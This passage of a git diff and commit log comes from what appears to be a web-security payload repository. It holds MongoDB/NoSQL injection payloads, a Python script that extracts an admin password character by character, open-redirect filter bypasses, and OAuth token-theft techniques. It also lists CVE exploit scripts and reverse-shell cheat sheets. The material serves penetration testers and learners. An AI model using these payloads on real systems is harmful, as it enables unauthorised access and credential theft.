 {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
 ```
 ## Blind NoSQL
 ```python
 import requests
 import urllib3
 import string
 import urllib
 urllib3.disable_warnings()
 username="admin"
 password=""
 while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = {'ids': payload}, verify = False)
            if 'OK' in r.text:
                print("Found one more char : %s" % (password+c))
                password += c
 ```
 ## MongoDB Payloads
 ```bash
 true, $where: '1 == 1'
 , $where: '1 == 1'
 $where: '1 == 1'
 ', $where: '1 == 1'
 1, $where: '1 == 1'
 { $ne: 1 }
 ', $or: [ {}, { 'a':'a
 ' } ], $comment:'successful MongoDB injection'
 db.injection.insert({success:1});
 db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
 || 1==1
 ' && this.password.match(/.*/)//+%00
 ' && this.passwordzz.match(/.*/)//+%00
 '%20%26%26%20this.password.match(/.*/)//+%00
 '%20%26%26%20this.passwordzz.match(/.*/)//+%00
 {$gt: ''}
 [$ne]=1
 ```
 ## Thanks to
 * [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
 * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
 * [cr0hn - NoSQL injection wordlists](https://github.com/cr0hn/nosqlinjection_wordlists)
 * [Zanon - NoSQL Injection in MongoDB](https://zanon.io/posts/nosql-injection-in-mongodb)
--- a/OAuth/README.md
+++ b/OAuth/README.md
@@ -1,4 +1,20 @@
-# OAuth 2 - Common vulnerabilities
+# OAuth
 ## Summary
 - [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
 - [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
 - [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
 - [OAuth private key disclosure](#oauth-private-key-disclosure)
 - [Authorization Code Rule Violation](#authorization-code-rule-violation)
 - [Cross-Site Request Forgery](#cross-site-request-forgery)
 - [References](#references)
 ## Stealing OAuth Token via referer
 From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
 > Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer 
 ## Grabbing OAuth Token via redirect_uri
@@ -46,9 +62,10 @@ Applications that do not check for a valid CSRF token in the OAuth callback are
 > The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request.
-## Thanks to
+## References
 * [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html)
 * [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html)
 * [How I hacked Github again. - Egor Homakov](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html)
 * [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html)
 - [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton
--- a/Redirect/Intruder/Open-Redirect-payloads.txt
+++ b/Redirect/Intruder/Open-Redirect-payloads.txt
--- a/Redirect/Intruder/open_redirect_wordlist.txt
+++ b/Redirect/Intruder/open_redirect_wordlist.txt
--- a/Redirect/Intruder/openredirects.txt
+++ b/Redirect/Intruder/openredirects.txt
--- a/Redirect/README.md
+++ b/Redirect/README.md
@@ -2,6 +2,43 @@
 > Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
 ## Summary
 - [Exploitation](#exploitation)
 - [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx)
 - [Fuzzing](#fuzzing)
 - [Filter Bypass](#filter-bypass)
 - [Common injection parameters](#common-injection-parameters)
 - [References](#references)
 ## Exploitation
 Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like :
 ```powershell
 https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
 ```
 After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.   
 What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
 ```powerhshell
 https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
 ```
 By visiting this url, if we get redirected to `evil-website.tld` after the signup, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.
 ## HTTP Redirection Status Code - 3xx
 - [300 Multiple Choices](https://httpstatuses.com/300)
 - [301 Moved Permanently](https://httpstatuses.com/301)
 - [302 Found](https://httpstatuses.com/302)
 - [303 See Other](https://httpstatuses.com/303)
 - [304 Not Modified](https://httpstatuses.com/304)
 - [305 Use Proxy](https://httpstatuses.com/305)
 - [307 Temporary Redirect](https://httpstatuses.com/307)
 - [308 Permanent Redirect](https://httpstatuses.com/308)
 ## Fuzzing
 Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
@@ -12,7 +49,7 @@ To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your t
 WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
 ```
-## Exploitation
+## Filter Bypass
 Using a whitelisted domain or keyword
@@ -48,6 +85,7 @@ Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
 Using "%E3%80%82" to bypass "." blacklisted character
 ```powershell
 /?redir=google。com
 //google%E3%80%82com
 ```
@@ -124,9 +162,11 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
 ?return_path={payload}
 ```
-## Thanks to
+## References
 * filedescriptor
 * [You do not need to run 80 reconnaissance tools to get access to user accounts - @stefanocoding](https://gist.github.com/stefanocoding/8cdc8acf5253725992432dedb1c9c781)
 * [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
 * [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
 * [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
 * [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
--- a/README.md
+++ b/README.md
@@ -2,23 +2,27 @@
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
-I <3 pull requests :)
+I :heart: pull requests :)
-You can also contribute with a beer IRL or with `buymeacoffee.com`
+You can also contribute with a :beers: IRL or with `buymeacoffee.com`
 [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
-Every section contains:
+Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
 - README.md - vulnerability description and how to exploit it
- Intruders - a set of files to give to Burp Intruder
+- Intruder - a set of files to give to Burp Intruder
- Some exploits
+- Images - pictures for the README.md
 - Files - some files referenced in the README.md
-You might also like :
+You might also like the `Methodology and Resources` folder :
 - [Methodology and Resources](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/)
  - [Active Directory Attack.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md)
-  - [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md)
+  - [Linux - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Persistence.md)
  - [Linux - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)
  - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md)  
  - [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md)
  - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md)
  - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md)
  - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
@@ -26,99 +30,26 @@ You might also like :
  - [Windows - Download and Execute.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md)
  - [Windows - Mimikatz.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Mimikatz.md)
  - [Windows - Persistence.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Persistence.md)
  - [Windows - Post Exploitation Koadic.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Post%20Exploitation%20Koadic.md)
  - [Windows - Privilege Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md)
  - [Windows - Using credentials.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Using%20credentials.md)
 - [CVE Exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits)
-  - Apache Struts 2 CVE-2017-5638.py
+    - Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
-  - Apache Struts 2 CVE-2017-9805.py
+    - Apache Struts 2 CVE-2017-5638.py
-  - Drupalgeddon2 CVE-2018-7600.rb
+    - Apache Struts 2 CVE-2017-9805.py
-  - Heartbleed CVE-2014-0160.py
+    - Apache Struts 2 CVE-2018-11776.py
-  - Shellshock CVE-2014-6271.py
+    - Docker API RCE.py
-  - Tomcat CVE-2017-12617.py
+    - Drupalgeddon2 CVE-2018-7600.rb
    - Heartbleed CVE-2014-0160.py
    - JBoss CVE-2015-7501.py
    - Jenkins CVE-2015-8103.py
    - Jenkins CVE-2016-0792.py
    - Shellshock CVE-2014-6271.py
    - Tomcat CVE-2017-12617.py
    - WebLogic CVE-2016-3510.py
    - WebLogic CVE-2017-10271.py
    - WebLogic CVE-2018-2894.py
    - WebSphere CVE-2015-7450.py
-## Try Harder
+You want more ? Check the [Books](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/BOOKS.md) and [Youtube videos](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/YOUTUBE.md) selections.
 Ever wonder where you can use your knowledge ? The following list will help you find "targets" to improve your skills.
 - __Bug Bounty Platforms__
  - [HackerOne](https://hackerone.com)
  - [BugCrowd](https://bugcrowd.com)
  - [Bounty Factory](https://bountyfactory.io)
  - [Synack](https://www.synack.com/)
  - [Intigriti](https://www.intigriti.com)
  - [List of Bounty Program](https://bugcrowd.com/list-of-bug-bounty-programs/)
 - __Online Platforms__
  - [Hack The Box](hackthebox.eu/)
  - [Penetration test lab "Test lab" | Pentestit](https://lab.pentestit.ru)
  - [PentesterLab : Learn Web Penetration Testing: The Right Way](https://pentesterlab.com/)
  - [Zenk-Security](https://www.zenk-security.com/epreuves.php)
  - [Root-Me](https://www.root-me.org)
  - [W3Challs](https://w3challs.com/)
  - [NewbieContest](https://www.newbiecontest.org/)
  - [Vulnhub](https://www.vulnhub.com/)
  - [The Cryptopals Crypto Challenges](https://cryptopals.com/)
  - [alert(1) to win](https://alf.nu/alert1)
  - [Hacksplaining](https://www.hacksplaining.com/exercises)
  - [HackThisSite](https://hackthissite.org)
  - [Hackers.gg](hackers.gg)
  - [Mind Map - Penetration Testing Practice Labs - Aman Hardikar](http://www.amanhardikar.com/mindmaps/Practice.html)
 ## Book's list
 Grab a book and relax, these ones are the best security books (in my opinion).
 - [Web Hacking 101](https://leanpub.com/web-hacking-101)
 - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
 - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
 ## More resources
 ### Blogs/Websites
 - [BUG BOUNTY FIELD MANUAL: THE DEFINITIVE GUIDE FOR PLANNING, LAUNCHING, AND OPERATING A SUCCESSFUL BUG BOUNTY PROGRAM](https://www.hackerone.com/blog/the-bug-bounty-field-manual)
 - [How to become a Bug Bounty Hunter - Sam Houston](https://forum.bugcrowd.com/t/researcher-resources-how-to-become-a-bug-bounty-hunter/1102)
 - [Tips from Top Hackers – Bug Hunting methodology and the importance of writing quality submissions - Sam Houston](https://www.bugcrowd.com/tips-from-top-hackers-bug-hunting-methodology-and-the-importance-of-writing-quality-submissions/)
 - [ARNE SWINNEN'S SECURITY BLOG JUST ANOTHER INFOSEC BLOG](https://www.arneswinnen.net)
 - [XSS Jigsaw - innerht.ml](https://blog.innerht.ml)
 - [ZeroSec Blog: Featuring Write-Ups, Projects & Adventures](https://blog.zsec.uk/tag/ltr101/)
 ### Youtube
 - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)
 - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
 - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
 - [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)
 ### Docker
 | Command     | Link |
 | :------------- | :------------- |
 | `docker pull remnux/metasploit` | [docker-metasploit](https://hub.docker.com/r/remnux/metasploit/) |
 | `docker pull paoloo/sqlmap`     | [docker-sqlmap](https://hub.docker.com/r/paoloo/sqlmap/)         |
 | `docker pull kalilinux/kali-linux-docker` | [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-linux-docker/) |
 | `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
 | `docker pull wpscanteam/wpscan`       | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
 | `docker pull infoslack/dvwa`          | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
 | `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) |
 | `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
 | `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
 | `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
 | `docker-compose build && docker-compose up` | [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) |
 | `docker pull citizenstig/nowasp` | [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) |
 | `docker pull bkimminich/juice-shop` | [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container) |
--- a/Injection/Images/SAML-xml-flaw.png
+++ b/Injection/Images/SAML-xml-flaw.png
--- a/Injection/Images/XSLT1.jpg
+++ b/Injection/Images/XSLT1.jpg
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Swissky	f6564869f0	Fix typo in PHP Object injection	2019-07-05 18:42:42 +02:00
Swissky	13ba72f124	GraphQL + RDP Bruteforce + PostgreSQL RCE	2019-07-01 23:29:29 +02:00
Swissky	46780de750	PostgreSQL rewrite + LFI SSH	2019-06-29 19:23:34 +02:00
Swissky	144b3827ab	MS14-068 + /etc/security/opasswd	2019-06-29 17:55:13 +02:00
Swissky	3b85f1b6fc	UTF-8 encoding for File Inclusion	2019-06-29 11:20:17 +02:00
Swissky	b148a9c906	Merge pull request #76 from ElonSalfati/master Added 2 working sql injection lines	2019-06-28 17:30:12 +02:00
Elon Salfati	a4411ae086	Added 2 working sql injection lines	2019-06-28 18:16:45 +03:00
Swissky	7dda79bfc1	ImageMagik Ghost Script + Typo git summary	2019-06-26 00:07:06 +02:00
Swissky	1cec6e9a35	Merge pull request #75 from scarvell/master Added Freemarker SSTI PoC that doesn't require the use of "tags"/spaces	2019-06-24 14:32:11 +02:00
Brendan Scarvell	601db0e188	Added freemarker PoC that doesn't require spaces or tags	2019-06-24 21:38:56 +10:00
Swissky	9be62677b6	Add root user + PHP null byte version	2019-06-24 00:21:39 +02:00
Swissky	c3f96c6753	GraphQL injection : blind nosqli + sqli	2019-06-21 17:01:43 +02:00
Swissky	9745e67465	HQL Injection + references update	2019-06-16 23:45:52 +02:00
Swissky	6921cde15c	Merge pull request #73 from ahhh/patch-1 Update Windows - Privilege Escalation.md	2019-06-12 00:14:08 +02:00
Dan Borges	24a05c7098	Update Windows - Privilege Escalation.md	2019-06-11 11:51:09 -07:00
Swissky	8cec2e0ca3	Linux PrivEsc - Writable files	2019-06-10 11:09:02 +02:00
Swissky	94a60b43d6	Writable /etc/sudoers + Meterpreter autoroute	2019-06-10 11:00:54 +02:00
Swissky	a85fa5af28	Local File Include : rce via mail + kadimus	2019-06-10 00:05:47 +02:00
Swissky	5d4f65720a	PrivEsc - Common Exploits	2019-06-09 20:53:41 +02:00
Swissky	e8cd11f88f	plink + sshuttle : Network Pivoting Techniques	2019-06-09 18:13:15 +02:00
Swissky	adcea1a913	Linux PrivEsc + SSH persistency	2019-06-09 16:05:44 +02:00
Swissky	f5a8a6b62f	Meterpreter shell	2019-06-09 14:26:14 +02:00
Swissky	93f6c03b54	GraphQL + LXD/etc/passwd PrivEsc + Win firewall	2019-06-09 13:46:40 +02:00
Swissky	00f50c5f32	Merge pull request #72 from h1-ragnar/patch-1 Cloudflare XSS Bypasses by Bohdan Korzhynskyi	2019-06-06 19:03:17 +02:00
h1-ragnar	edcac293a8	Cloudflare XSS Bypasses by Bohdan Korzhynskyi	2019-06-05 21:36:41 +03:00
Swissky	b031115588	Merge pull request #71 from jonasw234/master Add nginx log files for LFI log poisoning	2019-05-30 12:33:24 +02:00
Jonas Wendorf	f5702467d6	Add nginx log files for LFI log poisoning	2019-05-30 12:01:24 +02:00
Swissky	f88da43e1c	SQL informationschema.processlist + UPNP warning + getcap -ep	2019-05-25 18:19:08 +02:00
Swissky	b1a05d1aab	Create License Fix issue #69	2019-05-25 16:27:35 +02:00
Swissky	72c96ade44	Merge pull request #70 from AlexisVLRT/master Some link's markdown was broken	2019-05-24 17:37:39 +02:00
Alexis VIALARET	506014dd5f	Some link's markdown was broken	2019-05-24 17:15:33 +02:00
Swissky	9c2e63818f	XSS without parenthesis, semi-colon + Lontara	2019-05-15 21:55:17 +02:00
Swissky	cc8c7b3e70	Fix YOUTUBE and BOOKS links	2019-05-12 22:59:22 +02:00
Swissky	698cc52eaa	README rewrite : BOOKS and YOUTUBE	2019-05-12 22:43:42 +02:00
Swissky	b81df17589	RFI - Windows SMB allow_url_include = "Off"	2019-05-12 22:23:55 +02:00
Swissky	bab04f8587	Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp	2019-05-12 21:34:09 +02:00
Swissky	765c615efe	XSS injection Summary + MSF web delivery	2019-05-12 14:22:48 +02:00
Swissky	6bc297252a	Merge pull request #67 from roman-mueller/master Remove http:// prefix for DNS queries	2019-05-08 01:27:16 +02:00
Roman Mueller	403cb4ef65	Remove http:// prefix for DNS queries	2019-05-07 18:14:49 +02:00
Swissky	2b3f07236b	XSLT in SAML	2019-04-28 13:06:59 +02:00
Swissky	d0f14cbfde	Merge pull request #66 from cclauss/patch-1 Use print() function in both Python 2 and Python 3	2019-04-27 01:02:09 +02:00
cclauss	a458cb397d	Use print() function in both Python 2 and Python 3 Legacy __print__ statements are syntax errors in Python 3 but __print()__ function works as expected in both Python 2 and Python 3.	2019-04-26 14:35:16 -04:00
Swissky	bd861e304f	Merge pull request #65 from noraj/patch-1 add JSON headers	2019-04-25 01:16:36 +02:00
Alexandre ZANNI	0ccccd0fea	add JSON headers	2019-04-24 22:59:24 +02:00
Swissky	5bb27ee889	SSRF Google Cloud - add ssh key	2019-04-22 11:35:07 +02:00
Swissky	4d3ee90eec	Command injection rewritten	2019-04-21 19:50:50 +02:00
Swissky	81f93a19c2	SSRF AWS Elastic Beanstak	2019-04-21 18:51:32 +02:00
Swissky	aac5a57932	Merge pull request #64 from noraj/patch-1 add nosqli GET example	2019-04-21 14:12:06 +02:00
Swissky	9dfd7835ea	mitm6 + ntlmrelayx	2019-04-21 14:08:18 +02:00
Alexandre ZANNI	e467d6096a	add nosqli GET example	2019-04-21 13:00:16 +02:00
Swissky	49b9d0aff7	MSQL UDF sys_exec + SSRF IP: 127.1 and 127.0.1	2019-04-20 20:23:40 +02:00
Swissky	271cc269b6	Merge pull request #63 from BillyNoGoat/patch-1 Fixed link for google CSP bypass	2019-04-16 18:55:29 +02:00
BillyNoGoat	e0dbfc1578	Fixed link for google CSP bypass	2019-04-16 11:37:59 +01:00
Swissky	13864bde04	GoGitDumper + MySQL summary rewrite	2019-04-15 00:49:56 +02:00
Swissky	b4633bbb66	sudo_inject + SSTI FreeMarker + Lin PrivEsc passwords	2019-04-14 21:01:14 +02:00
Swissky	b8e74fe0ba	Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings	2019-04-14 19:48:36 +02:00
Swissky	c66197903f	MYSQL Truncation attack + Windows search where	2019-04-14 19:46:34 +02:00
Swissky	ee00dc1803	Merge pull request #62 from PwnFunction/patch-1 Bypass using IPv6/IPv4 Address Embedding	2019-04-13 14:03:43 +02:00
PwnFunction	4c6f9e21e9	Bypass using IPv6/IPv4 Address Embedding	2019-04-13 17:06:06 +05:30
Swissky	eb045a7d12	Merge pull request #61 from cervoise/patch-1 Update README.md	2019-04-08 23:56:45 +02:00
Cervoise	5686af951d	Update README.md According to https://gynvael.coldwind.pl/n/php_quirks .pthm seems to be use.	2019-04-08 22:49:50 +02:00
Swissky	546ecd0e36	Linux Privesc - /etc/passwd writable	2019-04-07 23:40:36 +02:00
Swissky	aaaeb3f38e	Merge pull request #60 from Zeecka/patch-2 --dc-ip to -dc-ip for psexec cmd	2019-04-03 13:59:06 +02:00
Alex Zeecka	4b79b865c9	--dc-ip to -dc-ip for psexec cmd	2019-04-03 10:45:45 +02:00
Swissky	187762fac5	Fix typo in reverse shell	2019-04-02 22:45:08 +02:00
Swissky	3af87ddf98	Reverse shell summary + golang	2019-04-02 22:43:44 +02:00
Swissky	cbc57c7330	Merge pull request #58 from kisec/master Reverse shell Golang	2019-04-01 08:29:46 +02:00
kisec	1eb57ad919	Reverse shell Golang	2019-04-01 12:01:45 +09:00
Swissky	289fa8c22b	PrivEsc - Linux Task	2019-03-31 15:05:13 +02:00
Swissky	bbc9029dd6	XSS in several filetype based on @__Mn1__ blogpost	2019-03-26 21:49:03 +01:00
Swissky	90b182f10f	AD references - Blog Post + SSTI basic config item	2019-03-24 16:26:00 +01:00
Swissky	a509909561	PostgreSQL RCE CVE-2019–9193 + ADAPE + WinPrivEsc Resources	2019-03-24 16:00:27 +01:00
Swissky	5d1b8bca79	SAML exploitation + ASREP roasting + Kerbrute	2019-03-24 13:16:23 +01:00
Swissky	9d3eccef48	Merge pull request #57 from ajdumanhug/master Add XXE inside SVG	2019-03-23 23:02:31 +01:00
Aj Dumanhug	fed4bdab90	Add XXE inside SVG	2019-03-24 03:27:12 +08:00
Swissky	3b70783450	Merge pull request #56 from noraj/patch-1 add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)	2019-03-23 16:35:23 +01:00
Alexandre ZANNI	333b9ea85e	add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)	2019-03-23 15:51:16 +01:00
Swissky	594e35a358	Merge pull request #55 from rakeshmane/patch-1 Update README.md	2019-03-22 11:45:42 +01:00
Rakesh Mane	4b38516e3b	Update README.md Added Cloudflare XSS bypass	2019-03-22 13:53:25 +05:30
Swissky	bd9378cab7	Merge pull request #54 from clem9669/patch-2 Add authentification bypass	2019-03-21 23:33:30 +01:00
clem9669	ea1e5a63ad	Add authentification bypass admin' -- - (variant of pre-existing)	2019-03-21 16:44:37 +00:00
Swissky	09d52cded0	Merge pull request #53 from jaimingohel/patch-1 Added CTF writeup in reference section	2019-03-20 08:27:53 +01:00
Jaimin Gohel	3b4218e2a6	Added CTF writeup in reference section Added below URL: https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d	2019-03-20 12:19:25 +05:30
Swissky	06ec486aa5	Merge pull request #52 from tkmikan/master Fix changed urls	2019-03-19 23:57:31 +01:00
tkmk	0913e8c3bd	Fix changed urls	2019-03-19 20:18:06 +08:00
Swissky	2d4b98b9c2	Merge pull request #50 from clem9669/patch-1 MarkDown typo	2019-03-19 08:37:13 +01:00
clem9669	8ed6cdb9ae	MarkDown typo	2019-03-18 23:06:22 +00:00
Swissky	e9489f0768	Linux Priv Esc - minor update	2019-03-18 23:19:36 +01:00
Swissky	e5090f2797	Bazaar - version control system	2019-03-15 23:27:14 +01:00
Swissky	47490c1624	Merge pull request #49 from BitTheByte/master Fixed a typing mistake	2019-03-15 16:07:18 +01:00
Ahmed Ezzat	87b2ae3ef1	Fixed a typing mistake	2019-03-15 16:09:58 +02:00
Swissky	9d1ebbacdb	JSON Web Token - jwt_tool example	2019-03-10 13:33:50 +01:00
Swissky	ec61e99334	Linux - PrivEsc typo	2019-03-08 20:09:01 +01:00
Swissky	b22fd26800	Linux PrivEsc - LXD Group	2019-03-07 15:27:54 +01:00
Swissky	68df152fd3	Linux PrivEsc - Wildcard/NFS/Sudo	2019-03-07 15:09:06 +01:00
Swissky	404afd1d71	Fix name's capitalization	2019-03-07 00:07:55 +01:00
Swissky	21d1fe7eee	Fix name - Part 1	2019-03-07 00:07:14 +01:00
Swissky	ee334f981e	Web socket + title capitalization	2019-03-07 00:03:25 +01:00
Swissky	ef65f36902	Merge pull request #48 from dee-see/patch-1 Fix anchors in README.md	2019-03-06 16:16:08 +01:00
Dominic	c0b4381c13	Fix anchors in README.md	2019-03-06 09:22:05 -05:00
Swissky	f67be6ef0b	Merge pull request #47 from naliferopoulos/master Added GraphQL injection notes	2019-03-06 13:53:13 +01:00
Nick Aliferopoulos	007a1eda83	Added GraphQL injection notes	2019-03-06 14:18:54 +02:00
Swissky	450de2c90f	Typo fix	2019-03-04 19:40:34 +01:00
Swissky	e36b15a6d7	Windows PrivEsc - Table of content update	2019-03-03 20:05:27 +01:00
Swissky	ecadcf3d0f	Windows PrivEsc - Full rewrite	2019-03-03 20:01:25 +01:00
